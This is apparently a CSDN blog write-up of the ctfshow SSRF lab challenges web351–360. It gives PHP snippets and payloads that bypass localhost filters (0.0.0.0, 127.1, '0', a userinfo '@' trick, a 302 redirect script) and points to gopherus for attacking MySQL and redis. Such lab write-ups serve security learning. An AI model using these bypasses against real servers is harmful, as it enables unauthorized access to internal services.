ctfshow (ssrf学习和实践)

最新推荐文章于 2023-11-19 21:06:45 发布
最新推荐文章于 2023-11-19 21:06:45 发布
阅读量335 收藏
点赞数
文章标签: web unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45766062/article/details/121549676
版权

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);//初始化一个cURL会话
curl_setopt($ch, CURLOPT_HEADER, 0);//curl_setopt函数的作用是为一个CURL会话设置选项
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);//执行一个cURL会话
curl_close($ch);//关闭一个cURL会话并且释放所有资源。
echo ($result);
?>

第一道题多说几句,在curl_init()函数中传参和在curl_setopt()函数中设置CURLOPT_URL,效果是一样的都是取回一个url地址。
这里尝试发现需要以本地用户访问:

payload:url=http://127.0.0.1/flag.php

web352

这里url的scheme必须为http或者https,并且不能有localhost和127.0.0.这里多说一下。php的parse_url()函数可以解析url:

<?php
$url="http://www.aaaaa.com/aaa";
$parse=parse_url($url);
print_r($parse);
/**
 *显示
 *Array
(
[scheme] => http
[host] => www.aaaaa.com
[path] => /aaa
)
 */

可以用0.0.0.0绕过:

url=http://0.0.0.0/flag.php

web353

和web252一样

web354

这里可以利用302跳转,在自己的vps上搭一个:

<?php 
header("Location: http://127.0.0.1/flag.php");

payload:url=http://xxxxxx/xx.php
当然y4师傅找到了一个http://sudo.cc/可以直接使用

web355

这道题需要host小于5,可以使用的包括省略0,或者只有0都行,因为0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0

url=http://127.1/flag.php```
url=http://0/flag.php

web356

同上

web357

这里需要用到302跳转,在354中已经提到了,那么为什么这里要进行302跳转呢?
因为这个:

filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)

具体的使用方法参考:地址

web358

正则表达试的意思就是url以ctf开头以show结尾

<?php
$url="http://ctf.@127.0.0.1/flag.php?show";
$parse=parse_url($url);
print_r($parse);
/**
 *显示
 * Array
(
[scheme] => http
[host] => 127.0.0.1
[user] => ctf.
[path] => /flag.php
[query] => show
)
 */

web359/web360

这两道题都需要使用到gopherus工具地址:地址
web359打MySQL:
在这里插入图片描述

web360打redis:
在这里插入图片描述

需要注意的是这里的payload在下划线之后都需再次进行url编码。

KKKKKento
关注
SSRF bible. Cheatsheet
08-06
Cheatsheet SSRF attack and sockets presentation." 显示了文档的主题为服务器端请求伪造(SSRF)攻击和相关技术的介绍与实践SSRF是一种网络攻击技术,攻击者可以利用它诱使服务器向攻击者指定的内部或外部地址...
CTFshow——SSRF
D.MIND 的博客
02-25 1058
文章目录web351——web352、353——黑名单过滤web354——DNS-Rebinding攻击绕过web355—— web351—— <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $resul
ctfshow—web入门—SSRF
最新发布
m0_74013288的博客
11-19 207
没有过滤,使用file协议读取本地文件。通过post提交。
ctfshow web入门(SSRF)
qq_53263789的博客
07-19 861
ctfshow
CTFshow web入门 SSRF
Lum1n0us's Blog
07-17 503
web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 第一题,啥也没
ctfshow web入门 SSRF
Sentiment的博客
12-09 786
web351
WebLogic SSRF 及漏洞修复
11-25
该漏洞主要出现在版本10.0.2和10.3.6的`SearchPublicRegistries.jsp`页面中,该页面存在不当的用户输入验证机制,使得攻击者可以通过构造恶意URL来触发SSRF攻击。 **2. 攻击原理** - **构造恶意URL**: 攻击者可以...
SSRFmap:自动SSRF模糊处理和开发工具
02-04
SSRF通常用于利用对其他服务的操作,此框架旨在轻松查找和利用这些服务。 SSRFmap将Burp请求文件作为输入和fuzz的参数。 服务器端请求伪造或SSRF是一个漏洞,攻击者在其中迫使服务器代其执行请求。 概要 模组 以下...
你未见过的SSRF利用方式
06-20
Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的...
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
同时,对于任何外部请求,应设置合理的超时机制,并对异常的请求时间和行为进行监控,以尽早发现和防止SSRF攻击。此外,对用户提供的输入进行严格的验证和过滤也是必要的,避免服务器执行不受控的网络请求。
ctfshow SSRF专题
会下雪的晴天
01-02 928
title: ctfshow SSRF专题 date: 2020-12-30 11:49:30 categories: ctfshow 新博客地址:https://yq1ng.github.io/ 随缘更 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) web351 web.
ctfshow-web入门 ssrf篇
volcano的博客
03-06 2457
ctfshowSSRF简介危害web351web352parse_urlweb353更改IP地址写法web354web355web356web357web358web359(打无密码的mysql)web360(打redis) SSRF 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 危害 SSRF可以对外网、
ctfshow web入门ssrf
m0_74097148的博客
04-09 289
【代码】ctfshow web入门ssrf。
【CTFshow】SSRF web351-360wp
weixin_51614272的博客
03-06 452
目录web351、352、353 、355、356web354、357web358web359、360 具体解析请查看这里:点击此处 web351、352、353 、355、356 url=http://0/flag.php url=http://0.0.0.0/flag.php url=http://127.1/flag.php url=http://2130706433/flag.php url=http://017700000001/flag.php url=http://0b111111100000
CTFshow_Web_SSRF——web351~web360(除354、357
Ho1aAs‘s Blog
03-18 1783
文章目录前言一、知识点Ⅰ、SSRF攻击点Ⅱ、gopher协议二、题解web351web352、353web355web356web358web359web360完 前言 354和357由于端口改变、服务器所限等原因,无法解出 一、知识点 Ⅰ、SSRF攻击点 <?php $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER,
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结
Love&Share
09-28 6188
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
ctfshow web入门 SSRF(超详解)
qq_50589021的博客
09-08 6466
前言 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) https://ctf-wiki.org/web/ssrf/ https://www.freebuf.com/articles/web/260806.html web351 <?php error_reporting(0)
ctfshow web入门-ssrf
akxnxbshai的博客
05-13 763
目录 开头: web 351 web 352 web 353 web 354 web 355 web 356 web 357 Web 358 Web 359 Web 360 开头: 简单了解一下SSRF。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统
【CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1168
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
ctfshow ssrf
08-16
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,通过利用服务器端请求功能,攻击者可以发送来自目标服务器的请求。在CTF比赛中,SSRF通常用于获取敏感信息或攻击内部系统。 在引用中提到了一系列与SSRF相关的内容,包括web351、web352、parse_url以及更改IP地址的写法等。些内容可能是指在CTF比赛中的具体题目或技术细节。 引用提到了SSRF的原理,即通过在URL中加入特殊字符来绕过解析过程,******<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow-web入门 ssrf篇](https://blog.csdn.net/weixin_45696568/article/details/114434596)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ctfshow--ssrf](https://blog.csdn.net/ing_end/article/details/124369282)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [ctfshow ssrf](https://blog.csdn.net/weixin_52240463/article/details/122659261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值